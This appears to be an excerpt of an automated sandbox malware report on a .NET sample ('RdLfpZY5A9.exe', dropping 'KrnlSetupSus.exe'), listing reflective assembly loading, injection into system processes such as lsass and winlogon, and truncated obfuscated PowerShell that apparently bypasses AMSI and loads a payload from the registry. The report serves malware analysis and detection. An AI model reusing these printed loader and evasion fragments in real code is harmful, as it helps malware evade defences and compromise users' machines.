Source: 0.2.RdLfpZY5A9.exe.12964350.1.raw.unpack, ajIsSiZ8AS1co09CghkkWvl6HPbkrUc8slzdbVDZhhdhgQNmeDruBDHdY3QTrEzPCoaUNp9BALGv4SFjurU81RTN5uY6xN.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{NX6lGwb3McFcQKpui0G08IJkdBCcVT9eXqEm5I79TRsa.lOhl5wnS2VSCSFCfUYhD1FldO0r12gsrxIRLn95mRNYW,NX6lGwb3McFcQKpui0G08IJkdBCcVT9eXqEm5I79TRsa.kb07IPurE12uyIzb2WxjbHZpaDnbCLPyrs27YGNBleTE,NX6lGwb3McFcQKpui0G08IJkdBCcVT9eXqEm5I79TRsa.x9zJjYHF78RFXW7xEyarFX3sZQIPgnSv6seyvw32d3Ak,NX6lGwb3McFcQKpui0G08IJkdBCcVT9eXqEm5I79TRsa.Ml17yRaCyswdlPv3uPlaqX0lTTQ0bVtaIYbFeMY5GJ4Q,fBE1wflwwjJOP1BboN3oP.U7gxRGEVBV9XvesbpeHlO()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.RdLfpZY5A9.exe.12964350.1.raw.unpack, ajIsSiZ8AS1co09CghkkWvl6HPbkrUc8slzdbVDZhhdhgQNmeDruBDHdY3QTrEzPCoaUNp9BALGv4SFjurU81RTN5uY6xN.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{WXxrAArJWY8XFp1YWN0McTEpspQwEI7GORy0[2],fBE1wflwwjJOP1BboN3oP.zbFKA3h0RY6TTT1PMhP2UR85XWXILLx7YgOhohB4lLMvKeoJfd6lk(Convert.FromBase64String(WXxrAArJWY8XFp1YWN0McTEpspQwEI7GORy0[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                              Source: 0.2.RdLfpZY5A9.exe.12964350.1.raw.unpack, ajIsSiZ8AS1co09CghkkWvl6HPbkrUc8slzdbVDZhhdhgQNmeDruBDHdY3QTrEzPCoaUNp9BALGv4SFjurU81RTN5uY6xN.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { WXxrAArJWY8XFp1YWN0McTEpspQwEI7GORy0[2] }}, (string[])null, (Type[])null, (bool[])null, true)
                              Source: 0.2.RdLfpZY5A9.exe.1294ef08.2.raw.unpack, ajIsSiZ8AS1co09CghkkWvl6HPbkrUc8slzdbVDZhhdhgQNmeDruBDHdY3QTrEzPCoaUNp9BALGv4SFjurU81RTN5uY6xN.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{NX6lGwb3McFcQKpui0G08IJkdBCcVT9eXqEm5I79TRsa.lOhl5wnS2VSCSFCfUYhD1FldO0r12gsrxIRLn95mRNYW,NX6lGwb3McFcQKpui0G08IJkdBCcVT9eXqEm5I79TRsa.kb07IPurE12uyIzb2WxjbHZpaDnbCLPyrs27YGNBleTE,NX6lGwb3McFcQKpui0G08IJkdBCcVT9eXqEm5I79TRsa.x9zJjYHF78RFXW7xEyarFX3sZQIPgnSv6seyvw32d3Ak,NX6lGwb3McFcQKpui0G08IJkdBCcVT9eXqEm5I79TRsa.Ml17yRaCyswdlPv3uPlaqX0lTTQ0bVtaIYbFeMY5GJ4Q,fBE1wflwwjJOP1BboN3oP.U7gxRGEVBV9XvesbpeHlO()}}, (string[])null, (Type[])null, (bool[])null, true)
                              Source: 0.2.RdLfpZY5A9.exe.1294ef08.2.raw.unpack, ajIsSiZ8AS1co09CghkkWvl6HPbkrUc8slzdbVDZhhdhgQNmeDruBDHdY3QTrEzPCoaUNp9BALGv4SFjurU81RTN5uY6xN.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{WXxrAArJWY8XFp1YWN0McTEpspQwEI7GORy0[2],fBE1wflwwjJOP1BboN3oP.zbFKA3h0RY6TTT1PMhP2UR85XWXILLx7YgOhohB4lLMvKeoJfd6lk(Convert.FromBase64String(WXxrAArJWY8XFp1YWN0McTEpspQwEI7GORy0[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                              Source: 0.2.RdLfpZY5A9.exe.1294ef08.2.raw.unpack, ajIsSiZ8AS1co09CghkkWvl6HPbkrUc8slzdbVDZhhdhgQNmeDruBDHdY3QTrEzPCoaUNp9BALGv4SFjurU81RTN5uY6xN.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { WXxrAArJWY8XFp1YWN0McTEpspQwEI7GORy0[2] }}, (string[])null, (Type[])null, (bool[])null, true)
                              Source: ntoskrnl.exe.3.dr, ajIsSiZ8AS1co09CghkkWvl6HPbkrUc8slzdbVDZhhdhgQNmeDruBDHdY3QTrEzPCoaUNp9BALGv4SFjurU81RTN5uY6xN.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{NX6lGwb3McFcQKpui0G08IJkdBCcVT9eXqEm5I79TRsa.lOhl5wnS2VSCSFCfUYhD1FldO0r12gsrxIRLn95mRNYW,NX6lGwb3McFcQKpui0G08IJkdBCcVT9eXqEm5I79TRsa.kb07IPurE12uyIzb2WxjbHZpaDnbCLPyrs27YGNBleTE,NX6lGwb3McFcQKpui0G08IJkdBCcVT9eXqEm5I79TRsa.x9zJjYHF78RFXW7xEyarFX3sZQIPgnSv6seyvw32d3Ak,NX6lGwb3McFcQKpui0G08IJkdBCcVT9eXqEm5I79TRsa.Ml17yRaCyswdlPv3uPlaqX0lTTQ0bVtaIYbFeMY5GJ4Q,fBE1wflwwjJOP1BboN3oP.U7gxRGEVBV9XvesbpeHlO()}}, (string[])null, (Type[])null, (bool[])null, true)
                              Source: ntoskrnl.exe.3.dr, ajIsSiZ8AS1co09CghkkWvl6HPbkrUc8slzdbVDZhhdhgQNmeDruBDHdY3QTrEzPCoaUNp9BALGv4SFjurU81RTN5uY6xN.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{WXxrAArJWY8XFp1YWN0McTEpspQwEI7GORy0[2],fBE1wflwwjJOP1BboN3oP.zbFKA3h0RY6TTT1PMhP2UR85XWXILLx7YgOhohB4lLMvKeoJfd6lk(Convert.FromBase64String(WXxrAArJWY8XFp1YWN0McTEpspQwEI7GORy0[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                              Source: ntoskrnl.exe.3.dr, ajIsSiZ8AS1co09CghkkWvl6HPbkrUc8slzdbVDZhhdhgQNmeDruBDHdY3QTrEzPCoaUNp9BALGv4SFjurU81RTN5uY6xN.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { WXxrAArJWY8XFp1YWN0McTEpspQwEI7GORy0[2] }}, (string[])null, (Type[])null, (bool[])null, true)
                              Source: KrnlSetupSus.exe.0.dr, ajIsSiZ8AS1co09CghkkWvl6HPbkrUc8slzdbVDZhhdhgQNmeDruBDHdY3QTrEzPCoaUNp9BALGv4SFjurU81RTN5uY6xN.cs.Net Code: ShBTJDYV4jRo7REWRW7Cr1jYv6C5FA7f2OU1EMoMQMNXmaxVLJoZvNOhSNYTOw3LCpoBLUvIGoswxzbB2QF4wbF77nAr7u System.AppDomain.Load(byte[])
                              Source: KrnlSetupSus.exe.0.dr, ajIsSiZ8AS1co09CghkkWvl6HPbkrUc8slzdbVDZhhdhgQNmeDruBDHdY3QTrEzPCoaUNp9BALGv4SFjurU81RTN5uY6xN.cs.Net Code: uNfoNI7Y4g6Dxv7WXOdS8LNPdcLqcF2mkaux System.AppDomain.Load(byte[])
                              Source: KrnlSetupSus.exe.0.dr, ajIsSiZ8AS1co09CghkkWvl6HPbkrUc8slzdbVDZhhdhgQNmeDruBDHdY3QTrEzPCoaUNp9BALGv4SFjurU81RTN5uY6xN.cs.Net Code: uNfoNI7Y4g6Dxv7WXOdS8LNPdcLqcF2mkaux
                              Source: 0.2.RdLfpZY5A9.exe.12964350.1.raw.unpack, ajIsSiZ8AS1co09CghkkWvl6HPbkrUc8slzdbVDZhhdhgQNmeDruBDHdY3QTrEzPCoaUNp9BALGv4SFjurU81RTN5uY6xN.cs.Net Code: ShBTJDYV4jRo7REWRW7Cr1jYv6C5FA7f2OU1EMoMQMNXmaxVLJoZvNOhSNYTOw3LCpoBLUvIGoswxzbB2QF4wbF77nAr7u System.AppDomain.Load(byte[])
                              Source: 0.2.RdLfpZY5A9.exe.12964350.1.raw.unpack, ajIsSiZ8AS1co09CghkkWvl6HPbkrUc8slzdbVDZhhdhgQNmeDruBDHdY3QTrEzPCoaUNp9BALGv4SFjurU81RTN5uY6xN.cs.Net Code: uNfoNI7Y4g6Dxv7WXOdS8LNPdcLqcF2mkaux System.AppDomain.Load(byte[])
                              Source: 0.2.RdLfpZY5A9.exe.12964350.1.raw.unpack, ajIsSiZ8AS1co09CghkkWvl6HPbkrUc8slzdbVDZhhdhgQNmeDruBDHdY3QTrEzPCoaUNp9BALGv4SFjurU81RTN5uY6xN.cs.Net Code: uNfoNI7Y4g6Dxv7WXOdS8LNPdcLqcF2mkaux
                              Source: 0.2.RdLfpZY5A9.exe.1294ef08.2.raw.unpack, ajIsSiZ8AS1co09CghkkWvl6HPbkrUc8slzdbVDZhhdhgQNmeDruBDHdY3QTrEzPCoaUNp9BALGv4SFjurU81RTN5uY6xN.cs.Net Code: ShBTJDYV4jRo7REWRW7Cr1jYv6C5FA7f2OU1EMoMQMNXmaxVLJoZvNOhSNYTOw3LCpoBLUvIGoswxzbB2QF4wbF77nAr7u System.AppDomain.Load(byte[])
                              Source: 0.2.RdLfpZY5A9.exe.1294ef08.2.raw.unpack, ajIsSiZ8AS1co09CghkkWvl6HPbkrUc8slzdbVDZhhdhgQNmeDruBDHdY3QTrEzPCoaUNp9BALGv4SFjurU81RTN5uY6xN.cs.Net Code: uNfoNI7Y4g6Dxv7WXOdS8LNPdcLqcF2mkaux System.AppDomain.Load(byte[])
                              Source: 0.2.RdLfpZY5A9.exe.1294ef08.2.raw.unpack, ajIsSiZ8AS1co09CghkkWvl6HPbkrUc8slzdbVDZhhdhgQNmeDruBDHdY3QTrEzPCoaUNp9BALGv4SFjurU81RTN5uY6xN.cs.Net Code: uNfoNI7Y4g6Dxv7WXOdS8LNPdcLqcF2mkaux
                              Source: ntoskrnl.exe.3.dr, ajIsSiZ8AS1co09CghkkWvl6HPbkrUc8slzdbVDZhhdhgQNmeDruBDHdY3QTrEzPCoaUNp9BALGv4SFjurU81RTN5uY6xN.cs.Net Code: ShBTJDYV4jRo7REWRW7Cr1jYv6C5FA7f2OU1EMoMQMNXmaxVLJoZvNOhSNYTOw3LCpoBLUvIGoswxzbB2QF4wbF77nAr7u System.AppDomain.Load(byte[])
                              Source: ntoskrnl.exe.3.dr, ajIsSiZ8AS1co09CghkkWvl6HPbkrUc8slzdbVDZhhdhgQNmeDruBDHdY3QTrEzPCoaUNp9BALGv4SFjurU81RTN5uY6xN.cs.Net Code: uNfoNI7Y4g6Dxv7WXOdS8LNPdcLqcF2mkaux System.AppDomain.Load(byte[])
                              Source: ntoskrnl.exe.3.dr, ajIsSiZ8AS1co09CghkkWvl6HPbkrUc8slzdbVDZhhdhgQNmeDruBDHdY3QTrEzPCoaUNp9BALGv4SFjurU81RTN5uY6xN.cs.Net Code: uNfoNI7Y4g6Dxv7WXOdS8LNPdcLqcF2mkaux
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: GetDelegateForFunctionPointer($lUrimOjxLHSAgu,$qnwSIaibfbWlFcLLMVH).Invoke(''+[Char](97)+'m'+'s'+''+[Char](105)+'.dll');$rLMnIHfZQPDuCMOEo=$ExDfVzsYxbumyj.Invoke($Null,@([Object]$kIpEHaJ,[Object](''+[
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+'f'+'l'+'e'+''+'c'+''+[Char](116)+''+[Char](101)+''+'d'+''+[Char](68)+''+[Char](101)+'l'+'e'+''+[Char](103)+''
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+'O'+[Char](70)+''+'T'+''+[Char](87)+''+[Char](65)+''+'R'+''+[Char](69)+'').GetValue(''+'$'+''+'7'+''+[Char](55)+''+[Ch
                              Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:zDgZeIZuxWRL{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$lbrdggfZMoOJSI,[Parameter(Position=1)][Type]$IOfHboHVyv)$RBuJknKpjnm=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+'f'+'l'+'e'+''+'c'+''+[Char](116)+''+[Char](101)+''+'d'+''+[Char](68)+''+[Char](101)+'l'+'e'+''+[Char](103)+''+[Char](97)+'t'+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'nM'+'e'+'m'+[Char](111)+'r'+[Char](121)+''+[Char](77)+''+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+'y'+'De'+[Char](108)+''+'e'+''+[Char](103)+'a'+'t'+''+'e'+'T'+[Char](121)+''+[Char](112)+''+[Char](101)+'','C'+[Char](108)+''+[Char](97)+''+'s'+''+[Char](115)+''+[Char](44)+''+'P'+''+[Char](117)+''+'b'+'l'+[Char](105)+''+'c'+''+','+''+'S'+''+'e'+'a'+'l'+''+'e'+'d'+[Char](44)+''+'A'+''+'n'+''+[Char](115)+'iC'+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+[Char](65)+''+'u'+''+'t'+'o'+[Char](67)+''+'l'+'a'+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$RBuJknKpjnm.DefineConstructor(''+'R'+''+[Char](84)+''+[Char](83)+''+[Char](112)+'e'+[Char](99)+''+[Char](105)+''+'a'+''+[Char](108)+'N'+'a'+''+'m'+'e'+[Char](44)+'H'+'i'+''+[Char](100)+''+[Char](101)+''+'B'+''+[Char](121)+''+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+'P'+'u'+'b'+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$lbrdggfZMoOJSI).SetImplementationFlags(''+'R'+'u'+'n'+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+','+''+[Char](77)+''+[Char](97)+'n'+[Char](97)+''+[Char](103)+'e'+'d'+'');$RBuJknKpjnm.DefineMethod(''+[Char](73)+''+[Char](110)+'voke','P'+[Char](117)+''+[Char](98)+''+[Char](108)+''
+[Char](105)+''+'c'+''+','+''+[Char](72)+''+[Char](105)+''+[Char](100)+'e'+[Char](66)+''+'y'+''+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+''+[Char](78)+'e'+[Char](119)+''+[Char](83)+''+[Char](108)+'o'+[Char](116)+''+[Char](44)+''+[Char](86)+''+[Char](105)+'r'+[Char](116)+''+'u'+''+[Char](97)+''+'l'+'',$IOfHboHVyv,$lbrdggfZMoOJSI).SetImplementationFlags(''+[Char](82)+'un'+[Char](116)+'ime'+','+''+[Char](77)+'a'+'n'+''+[Char](97)+''+'g'+''+'e'+''+[Char](100)+'');Write-Output $RBuJknKpjnm.CreateType();}$ysqdxYMCHCLNa=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('Sys'+'t'+''+'e'+''+'m'+''+[Char](46)+'d'+[Char](108)+''+'l'+'')}).GetType('Mi'+[Char](99)+'r'+[Char](111)+''+[Char](115)+''+[Char](111)+''+[Char](102)+''+[Char](116)+''+[Char](46)+''+[Char](87)+''+[Char](105)+''+[Char](110)+'3'+[Char](50)+''+[Char](46)+'U'+[Char](110)+'s'+'a'+''+[Char](102)+''+[Char](101)+'Nativ'+[Char](101)+''+[Char](77)+'e'+[Char](116)+'h'+[Char](111)+'d'+[Char](115)+'');$ExDfVzsYxbumyj=
                              Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:zDgZeIZuxWRL{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$lbrdggfZMoOJSI,[Parameter(Position=1)][Type]$IOfHboHVyv)$RBuJknKpjnm=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+'f'+'l'+'e'+''+'c'+''+[Char](116)+''+[Char](101)+''+'d'+''+[Char](68)+''+[Char](101)+'l'+'e'+''+[Char](103)+''+[Char](97)+'t'+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'nM'+'e'+'m'+[Char](111)+'r'+[Char](121)+''+[Char](77)+''+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+'y'+'De'+[Char](108)+''+'e'+''+[Char](103)+'a'+'t'+''+'e'+'T'+[Char](121)+''+[Char](112)+''+[Char](101)+'','C'+[Char](108)+''+[Char](97)+''+'s'+''+[Char](115)+''+[Char](44)+''+'P'+''+[Char](117)+''+'b'+'l'+[Char](105)+''+'c'+''+','+''+'S'+''+'e'+'a'+'l'+''+'e'+'d'+[Char](44)+''+'A'+''+'n'+''+[Char](115)+'iC'+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+[Char](65)+''+'u'+''+'t'+'o'+[Char](67)+''+'l'+'a'+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$RBuJknKpjnm.DefineConstructor(''+'R'+''+[Char](84)+''+[Char](83)+''+[Char](112)+'e'+[Char](99)+''+[Char](105)+''+'a'+''+[Char](108)+'N'+'a'+''+'m'+'e'+[Char](44)+'H'+'i'+''+[Char](100)+''+[Char](101)+''+'B'+''+[Char](121)+''+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+'P'+'u'+'b'+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$lbrdggfZMoOJSI).SetImplementationFlags(''+'R'+'u'+'n'+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+','+''+[Char](77)+''+[Char](97)+'n'+[Char](97)+''+[Char](103)+'e'+'d'+'');$RBuJknKpjnm.DefineMethod(''+[Char](73)+''+[Char](110)+'voke','P'+[Char](117)+''+[Char](98)+''+[Char](108)+''
+[Char](105)+''+'c'+''+','+''+[Char](72)+''+[Char](105)+''+[Char](100)+'e'+[Char](66)+''+'y'+''+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+''+[Char](78)+'e'+[Char](119)+''+[Char](83)+''+[Char](108)+'o'+[Char](116)+''+[Char](44)+''+[Char](86)+''+[Char](105)+'r'+[Char](116)+''+'u'+''+[Char](97)+''+'l'+'',$IOfHboHVyv,$lbrdggfZMoOJSI).SetImplementationFlags(''+[Char](82)+'un'+[Char](116)+'ime'+','+''+[Char](77)+'a'+'n'+''+[Char](97)+''+'g'+''+'e'+''+[Char](100)+'');Write-Output $RBuJknKpjnm.CreateType();}$ysqdxYMCHCLNa=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('Sys'+'t'+''+'e'+''+'m'+''+[Char](46)+'d'+[Char](108)+''+'l'+'')}).GetType('Mi'+[Char](99)+'r'+[Char](111)+''+[Char](115)+''+[Char](111)+''+[Char](102)+''+[Char](116)+''+[Char](46)+''+[Char](87)+''+[Char](105)+''+[Char](110)+'3'+[Char](50)+''+[Char](46)+'U'+[Char](110)+'s'+'a'+''+[Char](102)+''+[Char](101)+'Nativ'+[Char](101)+''+[Char](77)+'e'+[Char](116)+'h'+[Char](111)+'d'+[Char](115)+'');$ExDfVzsYxbumyj=
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FFB4ADEB05C push esp; retf 4_2_00007FFB4ADEB05D
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FFB4ADEDC55 pushad ; iretd 4_2_00007FFB4ADEDC79
                              Source: C:\Windows\System32\dllhost.exe Code function: 6_3_00000290EDB079F0 push rsp; retf 0000h 6_3_00000290EDB079F1
                              Source: C:\Windows\System32\dllhost.exe Code function: 6_3_00000290EDB08DD1 push rbx; retf 6_3_00000290EDB08DD2
                              Source: C:\Windows\System32\dllhost.exe Code function: 6_3_00000290EDB08DD8 push rsp; retf 6_3_00000290EDB08DD9
                              Source: C:\Windows\System32\dllhost.exe Code function: 6_3_00000290EDB1A5DD push rcx; retf 003Fh 6_3_00000290EDB1A5DE
                              Source: C:\Windows\System32\winlogon.exe Code function: 7_3_000002E9917279F0 push rsp; retf 0000h 7_3_000002E9917279F1
                              Source: C:\Windows\System32\winlogon.exe Code function: 7_3_000002E99173A5DD push rcx; retf 003Fh 7_3_000002E99173A5DE
                              Source: C:\Windows\System32\winlogon.exe Code function: 7_3_000002E991728DD1 push rbx; retf 7_3_000002E991728DD2
                              Source: C:\Windows\System32\winlogon.exe Code function: 7_3_000002E991728DD8 push rsp; retf 7_3_000002E991728DD9
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00007FFB4ACED2A5 pushad ; iretd 8_2_00007FFB4ACED2A6
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00007FFB4AE019DA pushad ; ret 8_2_00007FFB4AE019E9
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00007FFB4AED2316 push 8B485F92h; iretd 8_2_00007FFB4AED231B
                              Source: C:\Windows\System32\lsass.exe Code function: 10_3_00000213BDCB8DD1 push rbx; retf 10_3_00000213BDCB8DD2
                              Source: C:\Windows\System32\lsass.exe Code function: 10_3_00000213BDCCA5DD push rcx; retf 003Fh 10_3_00000213BDCCA5DE
                              Source: C:\Windows\System32\lsass.exe Code function: 10_3_00000213BDCB8DD8 push rsp; retf 10_3_00000213BDCB8DD9
                              Source: C:\Windows\System32\lsass.exe Code function: 10_3_00000213BDCB79F0 push rsp; retf 0000h 10_3_00000213BDCB79F1
                              Source: C:\Windows\System32\svchost.exe Code function: 11_3_00000158709A79F0 push rsp; retf 0000h 11_3_00000158709A79F1
                              Source: C:\Windows\System32\svchost.exe Code function: 11_3_00000158709A8DD8 push rsp; retf 11_3_00000158709A8DD9
                              Source: C:\Windows\System32\svchost.exe Code function: 11_3_00000158709BA5DD push rcx; retf 003Fh 11_3_00000158709BA5DE
                              Source: C:\Windows\System32\svchost.exe Code function: 11_3_00000158709A8DD1 push rbx; retf 11_3_00000158709A8DD2
                              Source: C:\Windows\System32\dwm.exe Code function: 12_3_0000026DB156A5DD push rcx; retf 003Fh 12_3_0000026DB156A5DE
                              Source: C:\Windows\System32\dwm.exe Code function: 12_3_0000026DB1558DD1 push rbx; retf 12_3_0000026DB1558DD2
                              Source: C:\Windows\System32\dwm.exe Code function: 12_3_0000026DB1558DD8 push rsp; retf 12_3_0000026DB1558DD9
                              Source: C:\Windows\System32\dwm.exe Code function: 12_3_0000026DB15579F0 push rsp; retf 0000h 12_3_0000026DB15579F1
                              Source: C:\Windows\System32\svchost.exe Code function: 13_3_000002A3EFFC79F0 push rsp; retf 0000h 13_3_000002A3EFFC79F1
                              Source: C:\Windows\System32\svchost.exe Code function: 13_3_000002A3EFFDA5DD push rcx; retf 003Fh 13_3_000002A3EFFDA5DE
                              Source: C:\Windows\System32\svchost.exe Code function: 13_3_000002A3EFFC8DD8 push rsp; retf 13_3_000002A3EFFC8DD9
                              Source: C:\Windows\System32\svchost.exe Code function: 13_3_000002A3EFFC8DD1 push rbx; retf 13_3_000002A3EFFC8DD2
                              Source: C:\Windows\System32\svchost.exe Code function: 15_3_000002C9AFB9A5DD push rcx; retf 003Fh 15_3_000002C9AFB9A5DE
                              Source: C:\Windows\System32\svchost.exe Code function: 15_3_000002C9AFB88DD1 push rbx; retf 15_3_000002C9AFB88DD2
                              Source: RdLfpZY5A9.exe Static PE information: section name: .text entropy: 7.986577451006427
                              Source: RdLfpZY5A9.exe, alIy4urw6ZG2T9PDfBIjnkiqw.csHigh entropy of concatenated method names: 'Pr8fjM0zXurZb15YbbotW2gYr', 'cEgJXUuxeQgEmiXmAtJIg8lEV', 'hTJCaANsznzPHgqPXV71cyfdO', 'yF6wmZngBWcQwXWvY7Vlh54r8', 'HDugdRJiD2Ty46k1bG432z8pl', 'aUWqS5zixnsZoe0X1ZuTWhxuB', 'iATTAURfxvbpwiWwlvkEzzwuG', 'uiHhryvKH9tlp2Noyq1QsdrBG', 'mH3t5L7XpeAlm5hEig8IYGvSs', '_15SNqpDkzoEq7i3jWmBP4S5Ov'
                              Source: RdLfpZY5A9.exe, WKd5CrXXyuWqnks4QEXvwcII4.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'il4Tkk1xnVda9Aau7ncvqSV5v', 'DQ3kUJOvER9rpavT4Mm0CPA2h', 'tJX6wP3k6eXnxuQCSpIY2Casw', 'ONZV5tjGA0l5NwyQds5OaYiOr'
                              Source: KrnlSetupSus.exe.0.dr, An0DSGyo344mWvaOGRrvwB3xPQTerGsbqj4hWP87gE2xj6Xf861To.csHigh entropy of concatenated method names: 'vHFFmttLONVktUsWUA3AJGFdJWwH3LXW3xXjpw21bBBfogjdXwixL', 'pDig5htp97pCUFbUOWgCFQEhPPMCswUZeqO0OvckzS0LVMk2IbATt', '_3zX6h0rbxTkLHYQL5aUcLZHZ7UzQhII1RWwOwCq7kahd95MljO1Y8', 'qWQJ4sEDsHWDMdrXMBkWJJMAR2ZJYuHYUXWKncElQ', 'gq4Qkyfs4qJPW0ELlZ3kPt15qUZ0cxiBsFeAPeQI5', 'RFBbtf7HwHMb6tA0XzPhNh0zTs2JPusWSKjbkqzCH', 'Ggm60FFRlbFETKfaMX2uqzTwCAlOOfzdpr80PQzQt', 'SfbFF1YXwOThpiQCsrqLkaZcTWr8qgkCV0BH53CKx', 'o54yd07s4Ybrh2mMTQmPy9G13JW9ciIrO77zM8H2u', 'pnE5wwk6209HgsLniyDfSldBWArhFkd7jbxxWqdyQ'
                              Source: KrnlSetupSus.exe.0.dr, g59OujVBB7MZJrqDCW5gf5pEZBK5CRLNy2qq.csHigh entropy of concatenated method names: 'Udog1cHZ1AZJdMqeZsOj2t0bHbbfTPyLXdZe', 'TTYQ8X2ipUHHOkpu8pFoVFvSsdMubt5OxO8w', 'HT2IJGVpP7zoCQKtrmw3udmHXeOWC8OpeL8N', 'M9quXEQLDHFgQdGrsqwRWJUMnoQCKJWjSr19mi7k424vOIRs8Fm0VrYwzEFpRaL', '_1R6sIwUFYAWIMc0rzfxjghWNfbNjvLbVc8IJBPCINsJKoQXG1mhyq3NKOhHPeSr', 'rDsj1OqcOyybEuCLD2FFi2BigjKCDFhW9PjBvEGOqBEnsU9SFadJtQkG7xaHR7X', 'qIJHJB3QXPOXWlGDcFiDAmtKitBmvx9A5fUf7AI0uqYmSXmbBJoJerF6poK7WhD', 'GHUFd804U76ooo0qpMgfZJtEwg6rVUVsmOdRDm6D4eJcy5wWm2iRwOzKSeaZU2v', 'HnLd5xAdbGZEMuhGUGFFabByTNuTI0ppEXue9G35Rm7RfXZT', 'Wbg4wkSPngGqJ8xephornvch2JT70vBDY2ex0FEFCEq8NqbS'
                              Source: KrnlSetupSus.exe.0.dr, B9E2fnMLcC12guuhzPwoS77zgW1ZgEiELCEEKaw2Klq5.csHigh entropy of concatenated method names: 'nvIwktLoxcNX1Yoqnf7SQGBzq9bmI6sAxpElhIxlHTTf', 'WAB40fyGIXFhlujIcnNSF6ImInBnekudbmbqIGmAsaQw', 'kZ8CdUlCp9uvwjQ3Qbw7TWFHyuInWi0dQnSIix6anlMJaie9o45d4PFFYcqaBFiqYovX8AZKjN8V', 'RKBr7RPx5MBcrYIh4IgNXmAPocRcxQIkES4vegZIf1KcSH7FtVgMm7LCGj2zT2NxkMkCki6Wu42g', '_2r1fsEY49aYbWGhzoGwNPvx1xQHfdn8rwpgaNoXz0Tuwx8n9y3w3rfGvPwPBcoQOVdGokzb2Yyq3', 's5g5xnN65pkcCGULZ4wfhDYsp3th2DWLXvhEsmb3JX3mt5g4QxSEY0anSxtvAHY62UNFQHi0BqM7', '_4OPzvYsw9YIZjEk0ugcA2t02sl6ai564i56NGeOWtgK3Xtr8qAwUFsInykU1M6qA3oGUuKoAzkN0', 'IbOlDrDw4uKuYEJJ7oENUTQVkFnyEAdK2E0nTN4HJMXZvdnUqL6A7xGIi5ecKEQ5qrimIPMJJsmC', 'E1CYunwxKQKpCDj7UCg7Iop0sQjq8FSZVg8O0lpyuUDw8tgLwTI5T6Ubs3ehtnKDgbDsnsr7nIlr', 'COf9r32smfr6yi32UMkNpnw81JfdBdmdEcHppRVvIgTUxLItsohhP6bWoT7cTmmGPTaO3XuntYsy'
